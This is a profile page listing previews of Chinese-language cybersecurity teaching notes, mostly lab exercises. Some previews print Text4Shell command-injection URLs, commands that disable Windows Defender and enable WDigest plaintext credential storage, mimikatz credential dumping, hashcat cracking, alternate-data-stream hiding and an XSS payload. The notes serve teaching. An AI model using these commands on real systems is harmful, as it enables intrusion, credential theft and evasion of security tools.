kddchuang

@KDDCo

Cyber Security Starter Sharing cyber security notes. Notes about hands-on teaching practice cyber security skills. Sharing techniques to everyone

Joined on Feb 11, 2019

  • 網路匿蹤用途 proxychains 自訂proxylist 開啟/etc/proxychains4.conf 設定模式 dynamic_chain 增加proxylist
     Like  Bookmark
  • 前言 在cmd和Pycharm兩個的python環境是不同的,當我要在cmd中使用Pycharm專案中的功能,可能會遇到套件缺少的問題 我打算打包Pycharm專案的程式碼,總是遇到套件缺失 所以必須在cmd中使用Pycharm專案建立的venv 進入虛擬環境 到專案建立的venv路徑下 在這個範例中,專案名稱是autoclick 1.切換到該目錄
     Like  Bookmark
  • 預設網路模式 docker bridge virtualbox NAT 各種網路模式比較 以VM為出發點,docker大致網路模式相同 NAT 應用場景:虛擬機只要求可以上網,無特殊要求,滿足最一般需求
     Like  Bookmark
  • 可參考 ssh port forward 部落格-情境舉例 環境描述 ATTACKERIP:172.20.10.13 JUMPER IP:172.20.10.14
     Like  Bookmark
  • tags: powershell 使用情境 binding shell 環境 KALI攻擊者10.101.12.183 Windows 10 10.101.11.127
     Like  Bookmark
  • good可用 http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D test http://localhost/text4shell/attack?search=%24{script%3Ajavascript%3Ajava.lang.Runtime.getRuntime().exec%28%27touch %2Ftmp%2Ftest'%29%7D 僅有參數要url encode,網址不可以 http://localhost/text4shell/attack?search=%24{script%3Ajavascript%3Ajava.lang.Runtime.getRuntime().exec('touch %2Ftmp%2Ffoo')}
     Like  Bookmark
  • COMMAND INJECTION 它允許攻擊者在運行應用程序的服務器上執行任意操作系統命令,通常會完全破壞應用程序及其所有數據。 通常發生在直接把使用者參數當作COMMAND LINE參數執行而導致的 科普 && 和&和||和|之差異 & 如果在指令後面加上 & 符別, 即表示指令在背景執行, 例如 my-script.sh & && 用 “&&” 分開兩個指令, 即第一道指令執行成功後, 才會執行第二道指令, 例如 make && make install
     Like  Bookmark
  • 攻擊目的 透過calc.exe的stream附加檔案,來附加cmd.exe 讓cmd.exe可以隱藏 cmd.exe如替換成惡意程式,可達到一定的隱蔽性,無法透過GUI看到cmd.exe這個附加文件 檔案需求 cmd.exe calc.exe 步驟
     Like  Bookmark
  • 不是服務,只是一個功能,存在記憶體執行,並無儲存攻擊 為了解決持久化問題,必須安裝iptables-persistent ref https://www.thomas-krenn.com/en/wiki/Saving_Iptables_Firewall_Rules_Permanently 流程 安裝iptables-persistent 打開/etc/iptables/rules.v4直接編輯
     Like  Bookmark
  • 簡介 模擬一個受害主機到C2主機報到的流程,本次實驗採用C語言編譯C語言報到程式,並參考swisskyrepo/PayloadsAllTheThings的程式碼 環境 KALI 攻擊機 (IP:192.168.226.128) UBUNTU 受害主機(IP:192.168.226.129) 網路皆為HOST-ONLY模式 實驗步驟
     Like  Bookmark
  • 窮舉模式 -m是sha1 -a 是窮舉 -o 是輸出結果 .\hashcat.exe e0c9035898dd52fc65c41454cec9c4d2611bfb37 -m 100 -a 3 -o result 窮舉+掩碼
     Like  Bookmark
  • tags: xss Reflected Cross Site Scripting (XSS) 在未過濾使用者輸入的情況下,攻擊者可輸入帶有執行程式碼之輸入文字 輸入後反射到瀏覽器執行 攻擊語法<script>alert(1)</script> 儲存型XSS ( Stored ) 誘發在留言板等能儲存文字的地方,使用者的輸入會被儲存到伺服器端,等到下個受害者拜訪該頁面時,xss語法就會再度被執行處發
     Like  Bookmark
  • 清除靜態檔案,生成,部署github hexo clean & hexo g & hexo d 清除靜態檔案,生成,啟動本地服務 hexo clean & hexo g & hexo s 查看本地網頁部落格
     Like  Bookmark
  • 基礎觀念(可跳過) 小小科普: ISO生成VM,如同image生成container VM 和 Docker差異 docker較輕量 實作 先SSH連線到CTFD主機上
     Like  Bookmark
  • 關閉windows defender powershell Set-MpPreference -DisableRealtimeMonitoring $true cmd reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f 偷密碼 mimikatz privilege::debug
     Like  Bookmark
  • 攻擊情境 目標機器是一台Windows Server,已經存在samba的CVE漏洞 已經成功找到payload成功滲透,開啟Reverse Shell 打算獲取使用者明文密碼或是NTLM hash值 1.load mimikatz 2.mimikatz指令 kiwi_cmd privilege::debug
     Like  Bookmark
  • session與restore 1. 破解開始,宣告session hashcat -m 1000 -a 3 win_user_NTLM --session win_user_ntlm_seesion 指定session名稱為Hashcat_session_name 2. 回復破解進度 hashcat -session win_user_ntlm_seesion --restore
     Like  Bookmark
  • MITRE Resource Development 攻擊者準備攻擊工具及建設惡意基站的基礎設施,還有準備可能所需要用到的憑證,可能是用竊取或是購買的來源方式,最後還有準備進行社交工程所準備的帳號。 技術細項 Acquire Infrastructure Botnet DNS Server
     Like  Bookmark
  • MITRE Persistence 介紹 攻擊者正試圖保持他們的立足點,本篇介紹總共19大Persistence相關技術 持久性包括對手用來保持對系統的訪問,跨越重啟、改變憑證和其他可能切斷其訪問的中斷的技術。用於持久性的技術包括任何讓他們在系統上保持立足點的訪問、行動或配置變化,例如替換或劫持合法代碼或添加啟動代碼。 技術細項 Account Manipulation(帳號操作)
     Like 1 Bookmark
  • 程式流程 跳出輸入帳號密碼視窗,並在視窗標題顯示未註冊 如曾正確登入後視窗標題會顯示已註冊,並鎖住登入視窗 思路 輸入正確帳密的程式用寫入註冊表來達成已註冊功能,可嘗試尋找註冊表路徑 追蹤"成功登入"字串上下文是否有帳密判斷及跳轉至判斷註冊表
     Like  Bookmark